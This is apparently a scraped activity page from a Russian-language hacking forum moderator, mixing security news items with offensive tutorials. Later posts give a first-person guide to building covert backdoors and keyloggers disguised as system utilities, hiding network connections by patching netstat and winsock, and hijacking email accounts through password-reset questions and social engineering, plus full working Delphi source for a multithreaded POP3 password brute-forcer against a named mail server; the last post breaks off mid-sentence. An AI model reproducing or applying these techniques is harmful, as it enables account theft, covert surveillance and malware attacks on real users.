

Саппорт
Moderators-
Content Count
123 -
Joined
-
Last visited
-
Days Won
1
My Favorite Songs
Саппорт last won the day on July 14 2020
Саппорт had the most liked content!
About Саппорт
- Currently Viewing Online User List
-
Rank
Техподдержка
Торговая информация
- Сделок: 0 Сделок: 0
- Депозит: 0 Депозит: 0
-
Guest reacted to a post in a topic: Взлом сервера (с эксплойтами)
-
Guest started following Саппорт
-
-
-
Президент России позволил пожизненно блокировать пиратские web-сайты
Саппорт posted a topic in Social engineering
Действие поправок к «антипиратскому» закону будет распространяться на все виды интеллектуальной собственности. Глава российского государства Владимир Путин утвердил коррективы к «антипиратскому» закону, сообщает портал РБК. Действие поправок будет распространяться на все виды интеллектуальной собственности, в том числе на музыкальные и литературные произведения, а также программное обеспечение. Исключение составят только фотоснимки. За несоблюдение законодательных требований ресурсы-нарушители будут пожизненно заблокированы. . При этом в документе предусмотрена возможность досудебного решения разногласий интернет-ресурсов и владельцев авторских прав. Закон также предусматривает перманентное отключение web-сайта в случае двух проигрышей в судебных процессах по иску одного и того правообладателя. Подобные решения будет принимать Мосгорсуд. В этом случае судебная инстанция должна будет проинформировать о своем вердикте Роскомнадзор, а тот – потребовать у операторов связи в течение 24 часов заблокировать доступ к ресурсу, содержащему нелегальный контент. Также ведомство будет вносить злостных нарушителей в реестр. Пункт о перманентной блокировке вызвал наибольшее количество критики среди юристов и экспертов по авторскому праву. По мнению главного аналитика РАЭК Карена Казаряна, перманентная блокировка web-сайтов предоставляет владельцам авторских прав слишком большую власть над интернет-ресурсами. При этом откровенно пиратские порталы эта мера никак не заденет, поскольку они с легкостью могут «переехать» на «другой адрес». Изменения в закон начнут действовать с 1 мая 2015 года. 14 ноября текущего года Госдума РФ приняла законопроект во втором и третьем чтении. Совет Федерации ратифицировал документ 19 ноября. -
Митрополит Климент: Интернет способствует распространению зла
Саппорт posted a topic in Social engineering
Священнослужитель уверен, что высокая скорость современного интернета способствует созданию и распространению зла. Высокоскоростной интернет способствует распространению зла. По данным «Интерфакса», такое заявление сделал известный церковный деятель, митрополит Калужский и Боровский Климент. Митрополит считает, что высокоскоростной интернет способствует быстрому появлению и распространению «зла», поскольку для создания чего-то плохого не нужны определенные навыки или умения. Тем не менее, для того чтобы создать что-то полезное, потребуются значительные усилия, время и духовный настрой, даже с учетом современных технологий. Сам интернет митрополит не воспринимает в качестве воплощения зла. Он согласен с тем, что глобальная сеть – всего лишь технология хранения и передачи информации, наподобие глиняных табличек, папируса и прочих способов хранения данных. Митрополит Климент (в миру Герман Капалин) председательствует в Издательском совете РПЦ и является одним из постоянных членов Священного Синода. С 2005 года священнослужитель вошел в Общественную палату. -
За последние четыре года преступники заработали более 25 млн рублей. Управление «К» МВД России задержало группу злоумышленников, сбывавших на потребительский рынок мобильные телефоны с предустановленным вредоносным ПО. Как сообщает «Росбалт», ссылаясь на пресс-центр МВД, шпионское ПО втайне от пользователя записывало его телефонные разговоры, перехватывало SMS-сообщения, переписки, а также фотографии и документы. Преступная группировка состояла из трех людей родом из Москвы, Йошкар-Олы и Республики Казахстан. Владельцем нелегального бизнеса был казах, который принимал заказы и организовывал встречи с клиентами, а также объяснял основы действия вредоносного ПО и способы его установки. Гражданин Йошкар-Олы занимался разработкой шпионского программного обеспечения, а также продвигал его в сети Интернет. Москвич исполнял обязанности курьера. На территории Центрального федерального округа группировка действовала более четырех лет, продавая вредоносное ПО своим клиентам, а также реализуя мобильные телефоны с предустановленными шпионскими программами. За это время было продано более 1000 телефонов, следящих за своими владельцами, а доходы преступников превысили 25 млн рублей. В настоящее время МВД ищет пользователей, купивших телефоны с предустановленным шпионским ПО. В отношении злоумышленников возбуждено уголовное дело по ст. 273 УК РФ.
-
Злоумышленники подписывают пользователей WhatsApp на дорогостоящие SMS-сервисы
Саппорт posted a topic in Social engineering
Пользователям приложения предлагают деактивировать индикатор непрочитанных сообщений. Специалисты компании ESET обнаружили новый вид мошенничества, связанный с популярным мессенджером WhatsApp - абонентам приложения предлагают деактивировать индикатор непрочитанных сообщений. В ноябре этого года в мессенждере WhatsApp была реализована новая функция - индикатор непрочитанных сообщений. Одна серая пометка означает, что сообщение поступило на сервер программы, две - на мобильное устройство и двойная голубая свидетельствует о том, что окно чата открыто пользователем. Данная инновация пришлась по душе не всем поклонникам приложения, однако пока функцию отключить невозможно. Возмущением абонентов одного из самых популярных мессенджеров не преминули воспользоваться киберпреступники. Они размещают в социальных сетях сообщения с предложением деактивации индикатора. Для этого пользователям необходимо перейти по короткой ссылке и далее действовать согласно указаниям. Как сообщают эксперты ESET, одна из ссылок ведет на web-страницу с формой, на полях которой необходимо ввести номер мобильного телефона. Однако вместо отключения нежелательной функции пользователь оказывается подписанным на дорогостоящие SMS-сервисы. Короткие ссылки могут также перенаправлять абонентов на фишинговые ресурсы или порталы, содержащие вредоносное программное обеспечение. -
В августе 98 года команда The Cult Of The Dead Cow выпустила пакет для удаленного администрирования – Back Orifice (BO). Честно говоря, я не очень обрадовался, когда услышал эту новость, так как я к этому времени уже писал «троянские кони». А после выхода BO люди все чаще и чаще стали задумываться о той опасности, которую несут в себе файлы неизвестного происхождения. Именно это помешало мне так же успешно продвигать свои творения несчастным юзерам – все теперь стали бдительными. Antiviral Toolkit Pro, самый популярный в России антивирусный пакет, теперь стоит практически у 80 процентов всего населения Рунета, и он знает все известные и кучу малоизвестных троянов. Так как же обмануть невинного пользователя сети и антивирусный пакет? Выбор составляющих backdoor Нет смысла говорить, что для добычи информации или доступа часто может понадобиться backdoor, который будет запущен там, где вам надо. Если выбран метод использования backdoor, то сразу же забудьте обо всех тех «неземных благах», которые несут в себе самые популярные трояны мира – BO, BO2K, NetBus Pro, Sub7, Donald Dick и прочие. Любой троян, про который знают более чем 5 человек, является неудачным. Помните, что самый эффективный троян, который может быть использован хакером – его личный троян, ну или, на крайний случай, тот, который написал хакерский друг-гуру. При составлении структуры трояна хакер должен забыть о всяких интересных и "полезных" вещах, таких как открывание cd-rom, выключение монитора, чат с жертвой. Backdoor нужен для того, что определяет его название – back door – незаметный проход, задняя дверь. Пишется он для того, чтобы получить доступ, манипулировать информацией, красть ее. Backdoor создается только для того, что нужно хакеру и ничего иного. В этом случае никакой антивирус не скажет про эту замечательную программу, что она backdoor. Мне понадобилось как-то узнать пароль root на одном UNIX. По стандартному методу мышления мне надо ломать саму машину, где стоит UNIX. Но она очень хорошо защищена, и это не так легко сделать, если вообще возможно. Но если вспомнить про человеческую незащищенность и социальную инженерию, то все UNIX-машины становятся доступны. Я сделал следующее: написал backdoor под Windows, который делал буквально следующее: он записывал все набранное на клавиатуре и давал доступ к диску. Все! Ничего лишнего. Получился этакий FTP-сервер с логой, того, что написано на компьютере. После этого я скачал все файлы с рабочей станции этого человека и взял логу того, что он писал. Этого оказалось достаточно, потому что там был аккаунт на UNIX-машину и пароль root. Его пароль был прописан в почтовом клиенте. А пароль root лежал в логе (когда он удаленно заходил на его сервер, он вводил этот пароль). В итоге была взломана машина UNIX. Хотя никакие стандартные методы проникновения замечены не были. Вывод: хакеру нужно думать более глобально, не ограничивать свое внимание только на объекте (жертве), а думать обо всех машинах в сети и о тех людях, которые сидят за этими машинами. Так вот, поэтому практически во многих ситуациях нам достаточно прочитать веб-сайт жертвы и написать backdoor. После этого, определить: к чему и для чего необходимо получить доступ. Если надо всего лишь скопировать всю информацию и то, что вводил пользователь с клавиатуры – можно ограничиться упрощенным FTP-сервером и кей-логгером. Мне этого хватит. Если есть желание постоянно наблюдать за жертвой, то можно встроить еще функцию screenshot, чтобы смотреть на экран жертве. Или же встроить поддержку socks-соединения, чтобы работать не напрямую, а через socks-сервер, таким образом обезопасить себя. Можно также обеспечить шифрование передаваемых данных и проверку паролем доступа к backdoor жертвы и добавить, если это необходимо, удаленное управление реестром. Plug-ins На начальном этапе жертве посылается только база. Такая база, которая вообще нечего не умеет. Но к ней можно подключиться и пристраивать плаг-ины. Можно это сделать в виде отдельных exe-файлов, а можно в виде dll. И в зависимости от того, что хакеру нужно на данном этапе, он подсоединяется к своему трояну-базе и вводит команду: скачать плаг-ин file manager, чтобы управлять файлами. Он качает и тут же устанавливает его, а хакер работает. Можно пойти еще дальше. В программу встраивается своеобразный скрипт, где прописано, чтобы в каждый четверг она скачивала определенный плаг-ин с какого-то URL, ставила и запускала его. Плаг-ин, совершив какую-либо работу и отослав результат своей работы хакеру на e-mail, удаляется. А взломщик, уже читая результат работы одного плаг-ина, перестраивает скрипт на тот лад, который ему необходим. При достаточном терпении можно очень долго манипулировать этой машиной и быть незамеченным. Ведь почему те юзеры, у которых не стоят антивирусы, догадываются о том, что с их компьютером что-то не так? Потому что злоумышленник часто бывает нетерпелив и поэтому перегружает машину жертвы так сильно, что это становится заметно невооруженным взглядом. Профессионалы терпеливы. Stealth-backdoors Теперь рассмотрим такую немаловажную вещь, как стелс-технологию. Заключается она в том, чтобы обмануть пользователя во время установки трояна и в тех случаях, когда юзер обнаружит троян и захочет его удалить. Мы не будем рассматривать такие принципы стелса, когда код трояна постоянно меняется, как в полиморфном вирусе. Я слышал, что разработчикам Donald Dick удалось сделать такое, но я в этом сомневаюсь. Реально полиморфного трояна создать нельзя. Создатели BO2K тоже во время разработки пытались сделать его полиморфным. Максимум, что им удалось – разбить троян на несколько частей. Итак, приступим. Возьмем небольшую программу, которая занимает от 15 до 35 килобайт в зависимости от языка и компилятора. Эта программа ничего не отсылает по почте и к ней нельзя подключиться. Это специально делается для того, чтобы обезопасить сохранность этой программы от злобных реверс-инженеров. При запуске, а лучше через неделю после запуска, она соединяется с прописанным в ней FTP- или WWW-сервером. Скачивает с него некую модифицированную программу (например, internat.exe - переключение кодировки) с встроенным троянцем. Я делал так: клал на FTP-сервер несколько версий этого internat: w95en.exe – w95 англ., w95ben.exe – w95 OSR2 англ., w95ru.exe – w95 рус., w95bru.exe – w95 OSR2 рус., w98en.exe – w98 англ., w98ru.exe – w98 рус., w98seen.exe – w98 SE англ., w98seru.exe - w98 SE рус., w2ken.exe – w2000 англ., w2kru.exe – w2000 рус. и качал соответствующий. После скачивания эта первоначальная программа заменяет родной internat программой, которая скачалась и удаляется. При перезагрузке он запускается как internat.exe, его даже видно в task list. Ни у кого нет подозрений. При этом порты он никакие не открывает, но раз в 30 минут принимает почту с определенного аккаунта, который в нем прописан. Если почта есть, он проверяет ее принадлежность к себе, если принадлежность обнаруживается, то он исполняет команды, которые там указаны. Например, запустить FTP-сервер или скачать программу из сети и ее запустить. Или удалиться. Или закачать лог-файл на FTP-сервер. Все, что угодно. Второй вариант такой. Небольшая программа (30-60 кб) при запуске соединяется с прописанным в ней FTP-сервером, скачивает с него некую модифицированную программу (например, internat.exe - переключение кодировки) со встроенным троянцем. При перезагрузке соединяется со специальным сервисом, который злоумышленник запускает на какой-нибудь UNIX-машине, ждет команд от него, и уже на тот сервер посылает свои команды. При этом на машине жертвы никак не смогут узнать, какой именно хакерский IP-адрес. Поэтому вычислить хакера будет крайне тяжело, только через промежуточный сервер. А если промежуточный сервер запускать на каком-нибудь сервере, который не играет для взломщика никакой роли (например, взломанный shell-box), то он в любой момент сможет удалить всю информацию на нем. И наконец, третий вариант. Небольшая программа (60 кб) при запуске соединяется с прописанным в ней FTP-сервером, скачивает с него полный комплект модифицированных программ, которые заменяют все стандартные утилиты (wordpad, internat, notepad, calc, image, write, explorer, scandisk, solitaire). При этом даже если кто-либо обнаружит, что-то в одной программе и заменит ее, будут работать другие. Желательно, чтобы в каждой из них был разный принцип работы (один через UNIX-box, другие через e-mail, третьи напрямую и т.д.). При этом, когда начинает работать другой, они шлют е-mail с извещением, каким образом ведет себя пользователь, и какие программы он запускает. Можно пойти дальше и заразить dll системы. В которых при вызове любой функции выполнялись бы и хакерские функции тоже. Сетевые соединения Как я борюсь с тем, что многие постоянно смотрят программой netstat свои текущие соединения? Все очень просто. В сети валяется исходник netstat, написанный на С. Нужно просто переписать его так, чтобы соединения с определенных адресов или на определенные порты не показывались. Можно пойти еще дальше. Взять и переписать dll winsock, т.к. существуют программы, которые показывают соединения, обращаясь напрямую к winsock. Исходный код winsock также можно легко найти в Сети.
-
Приватность и сбор персональных данных Обеспечение приватности человека, пользующегося широкими возможностями Интернета, и незаметный, но весьма интенсивный сбор данных, персонально идентифицирующих его личность, - это две очень серьезно конфликтующие друг с другом проблемы. Причем конфликт этот быстро становится одной из наиболее горячих тем как в развитии электронной коммерции, так и в более специфической области, деликатно именуемой "обеспечение нормальной работы правоохранительных органов". Занимающиеся маркетингом структуры постоянно изыскивают новые, все более эффективные пути для сбора максимально возможной информации о своих потенциальных покупателях. Для коммерции такие данные - удобное, а теперь и необходимое дополнение во всей той автоматизации, что предоставляется Интернетом. Уже вполне четко осознано, что с помощью Интернета намного легче собирать огромные объемы информации о потребителях, а взаимная увязка этих данных обеспечивает существенные прибыли в торговле. Однако защитники гражданских свобод вполне резонно усматривают в этих устремлениях покушение на фундаментальные права граждан, поскольку в подавляющем большинстве случаев информация о пользователях собирается без их согласия. Поэтому обеспечение анонимности пользователя Интернета и возможность использования псевдонимов в онлайновых коммуникациях рассматриваются как необходимые меры в защите и укреплении таких гражданских прав, как приватность и свобода слова. Службы анонимизации и их компрометация В последние годы в Интернете появился целый ряд служб, как бесплатно, так и за деньги предлагающих пользователям услугу "анонимизации". Другими словами, используя серверы этих служб как стартовую площадку для своих путешествий по Сети, пользователь получает гарантии, что все его персональные данные "срезаются", а посещаемые им веб-сайты получают в свое распоряжение лишь характеристики сервера-"анонимайзера". Среди десятков таких служб можно упомянуть наиболее известные: Anonymizer (www.anonymizer.com), проект компании Lucent под названием Private Web Access (www.bell-labs.com/project/lpwa), служба "Onion Router" Исследовательского центра ВМС США (www.onion-router.net), а также служба Aixs (http://aixs.net/aixs/). Но, как показало пристальное изучение возможностей этих служб, они не предоставляют той степени анонимности, которую декларируют. Соответствующее исследование было недавно проведено бостонским интернет-консультантом Ричардом Смитом (Richard M. Smith), который не стал разрабатывать никаких новых средств, а просто воспользовался известными инструментарием, который используют веб-серверы для идентификации своих посетителей. Смит продемонстрировал, что лишь этих инструментов, в сочетании с дефектами в популярных программах-браузерах Internet Explorer и Netscape Navigator, достаточно для компрометации служб анонимизации. Для организации тестирования Смит создал веб-сайт (www.tiac.net/users/smiths/anon/), котрый оборудовал соответствующими программами и разослал приглашения в компьютерные новостные группы. Для оценки степени защиты анонимности применялись шесть различных тестов, главным образом, использующие возможности языков Java, JavaScript и Active X. Реальные испытания показали, что все из четырех перечисленных выше служб анонимизации не смогли выдержать натиска и уступили по крайней мере одному из 6 тестов, пропустив и выдав реальный IP-адрес пользователя. По словам Смита, на всю эту демонстрацию ненадежности четырех наиболее авторитетных служб ушло меньше часа. "Сеть Свободы" Но вот теперь в Интернете появилась служба Freedom Network (www.freedom.net), созданная канадской компанией Zero Knowledge System и предлагающая качественно иную степень защиты анонимности пользователей. На разработку системы ушло около двух лет, и, как говорит о своем детище возглавляющий компанию Остин Хилл (Austin Hill): "Это инфраструктура, на которой будет строиться будущее. Мы рассматриваем нашу технологию как фундаментальную." Загружаемая с веб-сайта Freedom программа-клиент позволяет пользователям создавать для себя несколько псевдонимов, причем персональные данные не требуется хранить на каком-нибудь сервере третьей стороны. Вся информация, которой располагает предоставляющая услугу компания, - это данные кредитной карты, которой расплатились за услугу (50 долларов в год). Используя программу и псевдонимы (по желанию, разные для различных сетевых нужд), пользователь может путешествовать по Интернету с помощью цепи серверов, каждый из которых скрывает идентификатор пользователя и его "цифровые следы" при веб-серфинге, работе с электронной почтой, общении в новостных группах и чат-конференциях. Вся система имеет прочную криптографическую основу, поскольку в процессе пересылки пакеты с данными пользователя надежно шифруются. Зашифрованные пакеты пересылаются через множество серверов, которыми управляют провайдеры-партнеры для сокрытия маршрутов пакетов. По свидетельству сторонних экспертов, система freedom.net обеспечивает действительно мощную защиту анонимности. Как сказал Мадж (Mudge), один из лидеров известной бостонской группы хакеров L0pht, "здесь действительно делается то, что декларируется... и это весьма значительное достижение". Обеспокоенность органов Подобную степень защиты анонимности никакие трюки коммерческих веб-серверов, понятное дело, пробить не в силах. Более того, не на шутку переполошились правоохранительные и разведывательные органы Канады и США, усмотревшие в новой службе серьезную угрозу своей работе. Остин Хилл и его коллеги по Zero Knowledge получили уже множество приглашений в различные правительственные инстанции для разъяснения подробностей ими содеянного. В течение последних месяцев года им уже пришлось выступить с "презентацией своего продукта" перед представителями таких ведомств, как RCMP - "королевская конная полиция" (канадский аналог американского ФБР), CSE - Управление безопасности связи (аналог американской радиоразведывательной службы АНБ), CSIS - разведслужба (аналог ЦРУ). Была также неформальная встреча с сотрудниками Министерства юстиции США из подразделения по борьбе с компьютерными преступлениями. Поскольку в истории уже известны случаи, когда после подобных обработок компании радикально изменяли политику и ослабляли свои системы под нажимом властей, то в Интернет-сообществе зародилось естественное опасение относительно реальности дальнейшей стойкости "Сети Свободы". Однако Остин Хилл тут же предоставил общественности подробный отчет об имевшихся встречах с представителями властей и повторил те вещи, что рассказывал им. Суть дававшихся на презентациях разъяснений об особенностях технологии сводится к нескольким словам: "freedom.net вполне умышленно создавалась так, чтобы никому была недоступна любая информация о пользователе". По убеждению создателей системы, они не нарушают абсолютно никаких законов, в цифровой век предоставляя гражданам право на такую же анонимность в Сети, какую испокон веков предоставляли людям обычный лист бумаги и карандаш. В заключение же можно вспомнить высказывание одного известного адвоката по поводу того, что отличает свободное государство от тоталитарного. Вольно излагая его слова, в свободной стране у правоохранительных органов должны быть трудности с получением доступа к приватной информации граждан. Если же у органов нет никаких проблем с получением такого доступа, то это государство - фашистское.
-
Есть основные 4 способа взлома мыла. 1. Отсылка на атакуемое мыло сообщения, содержащего какой-то код, который после своего выполнения, позволит получить пароль или изменить его на нужный. Опять же, если мыло не соседа-собутыльника, а чего-то более серьезного, то письма получают не дырявым аутглюком и не експлорером, а почтовым клиентом с отключенным выполнением скриптов. Плюс еще их просматривают в диспетчере сообщений на предмет приатаченных файлов и на серваке стоит брандмауэр, который автоматом переименовывает все прикрепленные выполняемые файлы. Облом. Только засветиться. И ничего конкретно тут пообещать нельзя. 2. Ошибки web-интерфейса сервиса для работы с почтой. В частности, подмена запросов после авторизации на своем мыле так, чтобы вплыть в настройки чужого. Это все уже практически везде пофиксено. Останавливаться на этом не буду. 3. Взлом самого сервака с почтовым сервисом. Т.е. надо всесторонне изучить сервер, найти на нем дырки, найти бесплатный работающий эксплоит и т.д. и т.п. Дырок может и не быть или соответствующие эксплоиты платны или не выставленны на всеобщее обозрение. Тем более, если ты взломал сервер с серьезным мылом, то нафиг тебе за копейки продавать эту инфу. Если кто-то знает как им распорядиться, то имея сервак в кармане ты и сам можешь об этом догадаться. Или можно продавать информацию кусками, по мере ее поступления. В любом случае, обещание по поводу недели на взлом... 4. Брутфорс. Самый тупой способ. Перебор паролей по словарю или подряд всех символов. Остановимся более подробно на этом способе. Первое, что нужно для этого, это словарь. На этом же форуме я обнаружил еще одно очень веселое объявление о продаже файла, содержащего 360000 паролей. Файл паролей можно взять где угодно. Даже просто пойти и скачать какую-нибудь программу-переводчик. Теперь немного математики. Рассмотрим такой случай: пароль - не слово, а случайный набор маленьких английских символов. Для того, чтобы подобрать 2-ух буквенный пароль, по теории вероятности, надо 26*26/2=338 раз перебрать пароль. Для трехбуквенного - 26^3/2=8788, для четырехбуквенного - 26^4/2=228448 и т.д.. Тут, конечно, есть варианты. Можно сначала перебирать так: первая буква - гласная, вторая - согласная; первая - согласная, вторая - гласная. Но, если пароль состоит не только из маленьких английских букв, но и из больших, плюс цифры и спец-символы, то большой облом. Одно дело у себя локально на крутом компе подобрать пароль к excel-евскому документу, а другое дело по инету. Итак, мы определились, что прямой перебор не катит. При таком пароле, надо пробовать первые три способа. Немного о безопасности. Некоторые провайдеры делают мыло так, что получить его можно только выйдя в инет через них. Проверка может быть только на диапазон адресов и есть некоторая возможность для спуфинга, но... В общем, только третий способ. Ломать прова. Взломать его за неделю - это, мягко говоря, несколько опрометчивое высказывание. Или ты уже знаешь как и тогда это происходит за пару часов, или.... Рассмотрим перебор по словарю. Здесь есть несколько вариантов. Самый быстрый - задействовать свой полный шелл на быстром серваке. Есть несколько но : если обнаружат, то аккаунт прикроют. Ради призрачной вероятности заработать несколько денег, рисковать полным шеллом - это сильно круто и расточительно. Использовать прокси - тоже не выход. Можно использовать вариант с каким-то уже взломанным серваком, но см. выше. Его терять еще более обидно. Можно создать web-страницу c поддержкой запуска скриптов и повесить счетчик, который при каждом посещении будет перебирать несколько вариантов. Опять же, пагу могут и закрыть. Все усилия по ее раскрутке может зачеркнуть какой-то админ-мудак. Самый безопасный, но и самый ненадежный способ - накодить спец прогу и занести ее в компьютерный клуб. При работе с инетом, она будет перебирать по чуть-чуть пароли. Потом приходишь раз в ..., и смотришь результаты. Но эту прогу надо еще написать и замаскировать - в этом клубе админы могут полными идиотами и не быть. Ну и, самый распространенный способ - перебирать со своего компа. Есть целый ряд программ для этого, но все они мне, лично, не нравятся, и в этой статье я буду рассказывать, как написать брутфорсер самому. На самом деле, иногда, все не так уж и безнадежно. Рассмотрим несколько реальных примеров. Вернее, я оговорился - все примеры выдуманы, все имена изменены, и любые совпадения абсолютно случайны. Зеркало. Не люблю я спамеров. Вот интересный случай: прочитал я где-то объяву о том, что представитель этой масти может заплатить за спам лист, вытащенный из какого-то сервера. Мыло его было [email protected] Ломанулся я на www.glukr.net и сразу же нажал Забыл пароль . Служба борьбы с амнезией - очень интересная штука. Человек может указать очень сложный пароль, но правдиво, коротко и просто ответить на вопросы в интересующем нас разделе. Мне высветилось: Ответьте на вопрос: , sex , ясен пень - sex . Опа. Такая приятная табличка Установите новый пароль . Спамер остался без мыла. Для этого мне не понадобилось ничего, кроме моей любимой оперы и 2 минут времени. Идиотизм. Когда-то мне пришло письмо вроде бы от достаточно известной конторы, занимающейся безопасностью. Там было предложение заполнить резюме и выслать его на мыло с уже рассмотренного нами бесплатного, очень популярного, но такого дырявого glukr.net. Резюме было на 3- ех листах с просьбой указать ВСЮ информацию о себе. Я сразу заподозрил неладное. Или кто-то очень хотел получить обо мне всю инфу для каких-то своих черных замыслов и не имел ничего общего с этой конторой (что скорее всего), или в этой конторе есть очень умные люди (см. тему примера). На Забыл пароль у меня спросили рост. Введя пару значений, я обнаружил временную защиту, т.е. за определенный промежуток времени нельзя было вводить более двух вариантов. Рассудив, что карлик какой-то не будет отвечать на вопрос о росте, я начал со 180. Вводя по чуть-чуть цифры, к утру, я увидел такую родную сердцу табличку. Вместо того, чтобы ввести что-то типа 6 futov 1 дюйм + 2 litra пива , там было цифровое значение. Ничего я менять не стал, а то, вдруг действительно людей на работу берут, а я потопчусь своими кроссовками рибок 46-ого размера по большому и чистому.... Социальная инженерия. На некоторых серваках на вопрос Забыл пароль надо указать дату рождения и, например, любимое блюдо. Казалось бы, очень сложно, но.... Надо просто открыть мыло, например, [email protected] и послать с него открытку Поздравляю с днем рождения и какую-нибудь глупую подпись. Вполне возможно, что он ответит У меня не сегодня день рождения, а 32 марта . Или послать сообщение Мы разыгрываем 10000 видов на жительство у америкосов и Вас компьютер выбрал случайно. Укажите в обратном письме Ваше образование и дату рождения и ... . В общем, на первый взгляд, вполне безобидно. Вариантов много. Узнав его дату рождения, перебрать любимое блюдо - можно, но т.к. практически у всех есть временная защита, то тут, скорее всего, если сразу не угадал, тоже облом. Также может быть указано имя матери. Словарь из имен можно составить самому или взять на серваке с гороскопами по имени и прочей лабудой. Тут главное понять, что женских имен не так уж и много, и указывают их обычно не как лена или оля , а Елена или Ольга . Также следует учесть, что человеку иногда облом переключать раскладку и имя может быть в английской транскрипции. Глобальный поиск. Включить поиск по атакуемому мылу. Если это мыло присутствует на какой-нибудь доске объявлений или рассылке, то написать ему соответствующее сообщение (см. пример 3), исходя из полученных сведений. Также пароль в какой-нибудь форум или чат получить иногда гораздо легче, и в большинстве случаев он от пароля на мыло не отличается. Навороты web-сайта. На сервере одного прова обнаружил голосование, с просмотром результатов. Результаты вызывались через url, в котором указывался один из параметров - куда после этого перейти. С соответствующими правами. Гении программирования, мля. Там еще был дополнительный web-интерфейс для работы с почтой. В корень выйти не получилось, но сходив к ним, потратив несколько баксов на диалап и мыло, просканировав сервак на предмет установленного почтового сервиса и поэкспериментировав с купленным мылом, я понял, почему некоторые жаловались на то, что по 5-ти часовой карточке у них больше 2-ух часов не работаешь и кто-то периодически читает у этого прова все мыло. Но это тема отдельного разговора. Кстати, нужный мне пароль оказался qwerty . Обычно, первое слово в большинстве словарей. Рассмотрим способы защиты службы борьбы с амнезией. Первый - временная защита (кстати, на mail.xakep.ru я ее не обнаружил, хотя может не там смотрел). Второе - указывать любимое блюдо не Пиво и рост - не 215 . Таким образом, в большинстве случаев способ Забыл пароль не действует. Теперь рассмотрим вариант, при котором человек не должен догадываться, что его мыло читают, т.е. даже подбор Забыл пароль не катит. Перейдем непосредственно к исследованиям и кодингу. Я не буду рассматривать написание брутфорса на перл для работы на удаленном сервере - это есть на www.xakep.ru. Рассмотрим написание брутфорса на Delphi, с использованием функций WinAPI для работы с сокетом. Переписать на перл, си или асм потом проблем нет никаких - оно все отличается только синтаксисом вызова функций. Также потребуется какой-нибудь telnet-клиент, port-mapper или tcp-logger для исследования ответов сервера. POP3. 110 порт. Интересующие нас команды - user и pass . Предположим, что надо подобрать пароль на freemail.ukr.net у пользователя dndanil (это мой - специально для экспериментов). Ломанемся по телнету на freemail.ukr.net:110 и введем user dndanil . Потом pass password . Посмотрим ответы. Если после оценки скорости желание не отпало, то надо написать прогу, которая будет коннектится к серваку и перебирать пароли с отслеживанием ошибок. Прогу будем писать с учетом продвинутых технологий при создании различных сканеров - многопоточность, т.е. перебирать пароли будут сразу несколько процессов. Так, вроде, быстрей. Для этого надо ввести класс, описывающий наш процесс. Кол-во одновременно запущенных процессов зависит от железа и скорости соединения с инетом. Для перебора будем использовать файл с паролями, который загрузим в TStringList (список строк). Итак, создадим для наглядности окно и влепим туда кнопку Hack it :-) и ProgressBar с Win32. Вот исходники с комментариями брутфорсера для POP3-сервера: unit Unit1; interface uses Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs, ComCtrls, StdCtrls, WinSock; type TForm1 = class(TForm) Button1: TButton; ProgressBar1: TProgressBar; procedure Button1Click(Sender: TObject); procedure FormCreate(Sender: TObject); private { Private declarations } public { Public declarations } end; // Описание процесса type TScan = class(TThread) sock2 : TSocket; addr:TSockAddrIn; WSAData : TWSAData; private procedure CScan; protected procedure Execute; override; end; var Form1: TForm1; // Массив процессов Sock : array[1..255] of TScan; Rez : boolean = false; // Кол-во запущенных процессов на данный момент I0 : Integer; // Номер текущего пароля I : Integer; // TStringList с паролями PassList : TStringList; const FilePass = 'pass.txt'; // Файл с паролями в каталоге проги ProcCount = 10; // кол-во процессов POP3serv = '212.42.64.13'; // POP3 server (отпингованый) User = 'dndanil'; implementation {$R *.DFM} procedure TForm1.FormCreate(Sender: TObject); begin PassList:=TStringList.Create; end; // Запуск / Остановка procedure TForm1.Button1Click(Sender: TObject); begin if Rez then Rez:=false else begin // Открытие и загрузка файла паролей try PassList.Clear; PassList.LoadFromFile(FilePass); except end; if PassList.Count<=0 then begin Application.MessageBox('Файл паролей не найден или его нельзя использовать','ERROR',mb_Ok); exit; end; Form1.Button1.Caption:='Stop'; Form1.ProgressBar1.Position:=0; // Кол-во паролей Form1.ProgressBar1.Max:=PassList.Count; Application.ProcessMessages; I:=0; I0:=1; Rez:=true; // Запустить все процессы while true do begin Sock[i0]:=TScan.Create(false); inc(I0); // Подсчитать их кол-во //Выйти если больше указанного, или стоп, или подобрали if (I0>ProcCount)or(not Rez) then break; end; end; end; // Проца инициализации процесса procedure TScan.Execute; begin try // Запуск цикла while true do begin CScan; //Выход, если подобрали или закончился словарь if (not Rez)or(I>=PassList.Count) then break; end; except end; dec(I0); try Terminate; except end; //Если все процессы прерваны - if I0<=1 then begin Form1.Button1.Caption:='Hack it'; Rez:=false; Application.ProcessMessages; end; end; //Проца сканирования procedure TScan.CScan; var iaddr, x, I2 : Integer; Buf : array [1..255] of Char; //Отправка procedure sender(str:string); var I1 :integer; begin for I1:=1 to Length(str) do if send(sock2, str[i1] , 1, 0) = SOCKET_ERROR then exit; end; begin I2:=I; inc(I); Form1.ProgressBar1.Position:=I2+1; Application.ProcessMessages; try // Инициализация сокета WSAStartUp(257, WSAData); sock2:=socket(AF_INET,SOCK_STREAM,IPPROTO_IP); if sock2=INVALID_SOCKET then begin try closesocket(sock2); except end; exit; end; //Адрес сервака iaddr := inet_addr(PChar(POP3serv)); if iaddr <=0 then begin try closesocket(sock2); except end; exit; end; addr.sin_family := AF_INET; // Порт сервака addr.sin_port := htons(110); addr.sin_addr.S_addr:=iaddr; if (connect(sock2, addr, sizeof(addr))) >0 then begin try closesocket(sock2); except end; exit; end; //Получение при соединении x:=recv(sock2,buf,sizeof(Buf),0); if (x=SOCKET_ERROR)or(buf[1]<>'+') then exit; // user user sender('user '+User+#13+#10); x:=recv(sock2,buf,sizeof(Buf),0); if (x=SOCKET_ERROR)or(buf[1]<>'+') then exit; // pass password sender('pass '+PassList.Strings[i2]+#13+#10); x:=recv(sock2,buf,sizeof(Buf),0); //Если подобралось if (x>3)and(buf[1]='+') then begin Rez:=false; Application.MessageBox(PChar('Pass = '+PassList.Strings[i2]),'ENJOY',mb_Ok); exit; end; try closesocket(sock2); except end; except end; end; end. Адрес сервака перед использованием надо отпинговать (ping -a freemail.ukr.net) и ввести IP. Кол-во процессов подбирается исходя из железа. Это рабочий скелет брутфорсера, хоть и написан за пару часов. При проверке, я создал файл-словарь, размером 1000 паролей и 666-ым шел мой настоящий пароль. При одном процессе я задолбался ждать. При кол-ве процессов 255, уже через 15 минут (на диалап), мне высветился мой пароль. На шелле, аналогичная конструкция на 